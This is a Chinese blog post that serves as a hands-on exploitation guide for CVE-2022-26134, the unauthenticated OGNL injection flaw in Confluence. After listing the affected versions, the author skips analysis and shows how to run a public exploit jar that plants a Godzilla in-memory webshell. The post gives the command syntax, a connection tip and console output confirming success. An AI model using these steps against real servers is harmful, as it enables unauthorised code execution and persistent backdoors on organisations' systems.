banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量
HomeArchivesNFT 展示关于

CVE-2022-26134 Confluence OGNL RCE

#漏洞利用106
AI-generated summary
Recently, Confluence reported a serious vulnerability (CVE-2022-26134) that allows remote attackers to inject arbitrary code through OGNL expressions without authentication. This vulnerability affects Confluence Server and Data Center versions 1.3.0 and above. An exploit tool is available to execute arbitrary code on the affected system. More information can be found at the provided reference link.

漏洞描述#

最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134,远程攻击者在未经身份验证的情况下,可构造 OGNL 表达式进行注入,实现在 Confluence Server 或 Data Center 上执行任意代码。

利用范围#

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1

漏洞分析过程做不来,直接冲怎么用。

漏洞利用#

漏洞利用脚本如下:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
CVE-2022-26134.jar

java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
example
        java -jar CVE-2022-26134.jar pass key

如果内存 Shell 已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置 Burp 代理

Connection: close

image

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>

image

image

完事~

参考#

https://www.anquanke.com/post/id/274026 CVE-2022-26134 Confluence OGNL RCE 漏洞分析

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.